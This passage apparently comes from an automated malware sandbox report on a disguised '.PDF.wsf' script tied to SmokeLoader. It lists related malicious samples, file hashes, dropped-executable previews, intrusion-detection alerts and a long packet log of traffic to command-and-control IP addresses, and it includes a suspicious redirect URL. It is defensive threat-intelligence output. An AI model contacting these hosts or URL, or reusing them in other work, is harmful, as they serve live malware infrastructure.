                                                                                                                • 178.63.248.56
                                                                                                                CUBENODEESRmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 193.46.217.78
                                                                                                                https://public-usa.mkt.dynamics.com/api/orgs/656e8c66-5e77-ef11-ac1e-6045bd080c27/r/lmUG5F4EgUesqGwuJA5PigEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fcrm.interactivaclic.com%252Fn%252F%253Fc3Y9bzM2NV8xX29uZSZyYW5kPVNUVjBVakk9JnVpZD1VU0VSMjMwOTIwMjRVMjYwOTIzMjE%253DN0123N%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=HTFuI1dWNsWznL3K1x2s1mvQbKix%2BdykwHJYfkmm7o4%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                                                                                • 89.44.32.18
                                                                                                                cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                                                                                • 83.147.55.182
                                                                                                                New_Document-660111409161.wsfGet hashmaliciousXWormBrowse
                                                                                                                • 83.147.55.182
                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 83.147.57.108
                                                                                                                F24_023.pdf (1).jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                F24_023.pdf.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                F24_023.pdf.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                F24_023.pdf (1).jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                F24_023.pdf_1.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                No context
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\Users\user\AppData\Local\Temp\oBuf.exeRmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  3388.PDF.htaGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    C:\Users\user\AppData\Roaming\wbfgshsRmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      3388.PDF.htaGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):64
                                                                                                                        Entropy (8bit):1.1940658735648508
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                                                                        MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                                                                        SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                                                                        SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                                                                        SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:@...e................................. ..............@..........
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):222720
                                                                                                                        Entropy (8bit):6.497652873737398
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                        MD5:31059E7394B880F017E83804D9B716AB
                                                                                                                        SHA1:2C0057C276D7D2020D1E5A60CA6D44E2FB91674E
                                                                                                                        SHA-256:F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
                                                                                                                        SHA-512:A31E40888FC80CE8E138833155A63EDDC7EA9D4A37BCEB95A46E2CE937E42DFC74DF34FC9869F95940EE0F73D00F3A72839F220F09499B4F28AA1B91E5B706F9
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: RmbF3635xY.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 3388.PDF.hta, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L....`Ie.....................d....................@.........................................................................D...P....P.....................................................X........................................................text....~.......................... ..`.rdata.." ......."..................@..@.data...............................@....tls.........@......................@....rsrc.......P......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):222720
                                                                                                                        Entropy (8bit):6.497652873737398
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                        MD5:31059E7394B880F017E83804D9B716AB
                                                                                                                        SHA1:2C0057C276D7D2020D1E5A60CA6D44E2FB91674E
                                                                                                                        SHA-256:F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
                                                                                                                        SHA-512:A31E40888FC80CE8E138833155A63EDDC7EA9D4A37BCEB95A46E2CE937E42DFC74DF34FC9869F95940EE0F73D00F3A72839F220F09499B4F28AA1B91E5B706F9
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: RmbF3635xY.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 3388.PDF.hta, Detection: malicious, Browse
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L....`Ie.....................d....................@.........................................................................D...P....P.....................................................X........................................................text....~.......................... ..`.rdata.." ......."..................@..@.data...............................@....tls.........@......................@....rsrc.......P......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                        File type:Unicode text, UTF-8 text, with very long lines (1251), with CRLF line terminators
                                                                                                                        Entropy (8bit):4.743513333591595
                                                                                                                        TrID:
                                                                                                                          File name:3312.PDF.wsf
                                                                                                                          File size:233'272 bytes
                                                                                                                          MD5:701f5342e776f67438ee65a228b3d43d
                                                                                                                          SHA1:a6a64eafe7d80017411bb18e8873f4623343fa66
                                                                                                                          SHA256:19a2e0704d092bc44ba2802c45e6d845f6b912831c8a2b7f21d0b3d900408000
                                                                                                                          SHA512:fff9678651566573e02ac95215b2db3b24e0d6e2257500f1b7c047f67797aff52bc4ed38adbf272e43f8db527c034a8393c3aad99326b9bb43fee7b2fdec0b1e
                                                                                                                          SSDEEP:1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EQaDWP4ANQd3mqQmBBo:yBj5GsTwPMOS8+iBj5GsTwPMOS8+O
                                                                                                                          TLSH:B734941E8B4B17F5432343D259CA6CE6FB64613DD35FE95478288F6C6212C2893BA8DC
                                                                                                                          File Content Preview:..Wikisource was created as a separate project on 24 November 2003, to host free textual sources as its aim in multiple languages and translations.....2004....In March 2000, the Nupedia project was started. Its intention was to publish articles written by
                                                                                                                          Icon Hash:68d69b8f86ab9a86
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-10-04T15:10:28.037533+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1049703193.46.217.7880TCP
                                                                                                                          2024-10-04T15:11:00.938931+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049710193.46.217.7880TCP
                                                                                                                          2024-10-04T15:11:02.326832+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049711188.40.141.21180TCP
                                                                                                                          2024-10-04T15:11:02.573845+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049711188.40.141.21180TCP
                                                                                                                          2024-10-04T15:11:28.362203+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049713193.46.217.7880TCP
                                                                                                                          2024-10-04T15:11:28.563608+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049711188.40.141.21180TCP
                                                                                                                          2024-10-04T15:11:28.823919+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049711188.40.141.21180TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 4, 2024 15:10:27.070172071 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:27.078547001 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:27.078641891 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:27.079555035 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:27.085145950 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037300110 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037318945 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037331104 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037444115 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037456989 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037533045 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:28.037533045 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:28.037883997 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037897110 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037908077 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037919044 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037930012 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.037938118 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:28.038110018 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:28.038110018 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:28.042684078 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.042696953 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.042709112 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:28.042749882 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:28.089462996 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.061707020 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.061727047 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.061739922 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.062011003 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.153137922 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.153153896 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.153235912 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.297600985 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.297718048 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.297732115 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.297746897 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.297842026 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.297842026 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.558166027 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558190107 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558202982 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558218002 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558233023 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558249950 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.558341026 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.558593988 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558608055 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558625937 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558643103 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.558716059 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.558779001 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.559395075 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.559735060 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.559983015 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.604949951 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.640583038 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.640711069 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.640773058 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.640891075 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.640903950 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.640917063 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.640939951 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.641061068 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.641146898 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.641941071 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.641952991 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.642081022 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.642256021 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.642268896 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.642307997 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.721342087 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.721491098 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.721502066 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.721513033 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.721596956 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.721611977 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.721657991 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.721673012 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.721767902 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.801796913 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.801815987 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.801829100 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.801842928 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.801949978 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.802067041 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.802072048 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.802149057 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.802160978 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.802222013 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.802551985 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.802618027 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.802671909 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.806786060 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.806799889 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.806812048 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.806838036 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.806974888 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.882806063 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.882919073 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.883073092 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.883110046 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.884260893 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.884275913 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.884289980 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.884303093 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.884315968 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.884387970 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.884387970 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.972238064 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972254038 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972266912 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972408056 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.972825050 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972839117 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972852945 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972867012 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972898006 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.972918987 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972954988 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.972966909 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.972966909 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.972966909 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:29.973090887 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:29.973253965 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.026763916 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.038223028 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.038314104 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.038326025 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.038372993 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.038386106 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.038398027 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.038414955 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.038418055 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.038449049 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.038660049 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.039437056 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.039518118 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.039529085 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.058979988 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.058996916 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.059154034 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.201056004 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.201162100 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.201174974 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.201185942 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.201200008 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.201212883 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.201227903 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.201251984 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.201251984 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.201358080 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.202023029 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.202039003 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.202090979 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.202163935 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.202512026 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.202521086 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.202811003 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.202893972 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.202974081 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.245528936 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.374876022 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.374893904 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.375046015 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.488200903 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488224030 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488326073 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488325119 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.488344908 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488363028 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488415956 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.488693953 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488707066 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488720894 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488795042 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.488795042 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.488796949 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.488814116 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.489064932 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.489630938 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.489682913 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.489695072 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.489963055 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.556587934 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.556606054 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.556617975 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.556709051 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.556723118 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.556746960 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.556783915 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.557154894 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.557169914 CEST8049703193.46.217.78192.168.2.10
